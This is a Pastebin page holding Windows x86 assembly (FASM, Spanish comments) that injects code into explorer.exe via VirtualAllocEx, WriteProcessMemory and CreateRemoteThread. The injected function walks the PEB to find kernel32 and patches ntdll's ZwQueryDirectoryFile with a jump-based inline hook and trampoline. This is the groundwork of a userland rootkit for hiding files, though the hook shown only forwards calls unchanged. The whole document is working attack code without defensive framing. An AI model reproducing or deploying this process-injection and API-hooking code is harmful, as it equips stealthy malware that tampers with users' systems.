Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- include 'win32ax.inc'
- .data
- ProcessName db "explorer.exe",0
- .code
- start:
- stdcall Inyectar,addr ProcessName,FINFuncion-FuncionInyectada,FuncionInyectada,[GetProcAddress]
- cmp eax,-1
- jne salir
- invoke MessageBoxA,0,"No se encontró el proceso!",0,0
- salir:
- invoke ExitProcess,0
- proc Inyectar,ProcessName,Tamaño,Funcion,Datos
- locals
- struct PROCESSENTRY32
- dwSize dd ?
- cntUsage dd ?
- th32ProcessID dd ?
- th32DefaultHeapID dd ?
- th32ModuleID dd ?
- cntThreads dd ?
- th32ParentProcessID dd ?
- pcPriClassBase dd ?
- dwFlags dd ?
- szExeFile rb MAX_PATH
- ends
- pInfo PROCESSENTRY32 ?
- Handle dd ?
- PID dd ?
- DirFuncion dd ?
- hProcess dd ?
- endl
- pushad
- ;Obtenemos el PID del proceso
- invoke CreateToolhelp32Snapshot,0x00000002,0
- mov [Handle],eax
- mov eax,sizeof.PROCESSENTRY32
- mov [pInfo.dwSize], eax
- BuclePid:
- invoke Process32Next,[Handle],addr pInfo
- cmp eax,0
- je FinProcBuclePID ;No hay más procesos
- invoke lstrcmp,addr pInfo.szExeFile,[ProcessName]
- cmp eax,0
- jne BuclePid
- jmp FinBuclePid
- FinProcBuclePID:
- invoke CloseHandle,[Handle]
- popad
- mov eax,-1
- ret
- FinBuclePid:
- invoke CloseHandle,[Handle]
- push [pInfo.th32ProcessID]
- pop [PID]
- ;Lazamos el proceso
- invoke OpenProcess,PROCESS_CREATE_THREAD+PROCESS_VM_OPERATION+PROCESS_VM_WRITE,FALSE,[PID]
- mov [hProcess],eax
- ;Reservamos espacio en el proceso
- invoke VirtualAllocEx,[hProcess],0,[Tamaño],MEM_COMMIT+MEM_RESERVE,PAGE_EXECUTE_READWRITE
- mov [DirFuncion],eax
- ;Escribimos los datos en memoria
- invoke WriteProcessMemory,[hProcess],[DirFuncion],[Funcion],[Tamaño],0
- ;Creamos el hilo
- invoke CreateRemoteThread,[hProcess],0,0,[DirFuncion],[Datos],0,0
- popad
- mov eax,1
- ret
- endp
- proc FuncionInyectada,pGetProcAddress
- locals
- BaseKernel32 dd ?
- OriginalProtection dd ?
- endl
- ;Leemos el PEB para obtener la base de KERNEL32.DLL
- mov eax, [fs:030h]
- mov eax, [eax + 0ch]
- mov eax, [eax + 0ch]
- mKERNEL:
- mov eax, [eax]
- mov ebx, [eax + 030h]
- mov ecx, 00320033h
- cmp ecx, [ebx + 0ch]
- JNZ mKERNEL
- mov eax, [eax + 018h]
- mov [BaseKernel32],eax
- stdcall [pGetProcAddress],[BaseKernel32],"LoadLibraryA" ; Crgamos loadlibraryA
- stdcall eax,"ntdll.dll" ; Cargamos ntdll.dll
- stdcall [pGetProcAddress],eax,"ZwQueryDirectoryFile" ; Cargamos la api que hookearemos.
- mov ebx,eax
- stdcall [pGetProcAddress],[BaseKernel32],"VirtualProtect"
- stdcall eax,ebx,5,PAGE_EXECUTE_READWRITE,addr OriginalProtection ; Damos permisos de escritura.
- ;Calculamos el delta offset
- call delta
- delta:
- pop edx
- sub edx,delta ;edx=delta
- push edx
- add edx,dirFind ; guardamos la dirección de NtQueryDirectoryFile
- mov dword[edx],ebx
- pop edx
- mov ecx,edx
- add ecx,ApiOriginal
- mov al,byte[ebx]
- mov byte[ecx],al
- mov byte[ebx],0xE9 ;0xE9=jmp
- inc ebx
- inc ecx
- mov eax,dword[ebx]
- mov dword[ecx],eax
- mov eax,FuncionHook
- add eax,edx
- sub eax,ebx
- sub eax,4
- mov dword[ebx],eax
- add ebx,4
- add ecx,4
- ret
- ;--------------------------------------------------------------------------------------------------------------------------------------------
- ; Primeros bytes de la api y salto a la api original
- ApiOriginal:
- nop
- nop
- nop
- nop
- nop
- nop
- nop
- add edx,dirFind
- mov eax,dword[edx] ;la variable dirFind y la guardamos en eax
- add eax,5 ;Nos desplazamos 5 bytes
- jmp eax
- ;--------------------------------------------------------------------------------------------------------------------------------------------
- ;Función a la que salta el programa cuando se llama a la API hookeada
- proc FuncionHook,FileHandle,Event , ApcRoutine, ApcContext, IoStatusBlock, FileInformation, Length,FileInformationClass,ReturnSingleEntry, FileMask ,RestartScan
- call delta2
- delta2:
- pop edx
- sub edx,delta2
- push [RestartScan]
- push [FileMask]
- push [ReturnSingleEntry]
- push [FileInformationClass]
- push [Length]
- push [FileInformation]
- push [IoStatusBlock]
- push [ApcContext]
- push [ApcRoutine]
- push [Event]
- push [FileHandle]
- mov ecx,edx
- add ecx,ApiOriginal
- call ecx ; NtQueryDirectoryFile
- ret
- endp
- ;-------------------------------------------------------------------------------------------------------------------------------------------
- dirFind dd ?
- endp
- FINFuncion:
- .end start
Add Comment
Please, Sign In to add comment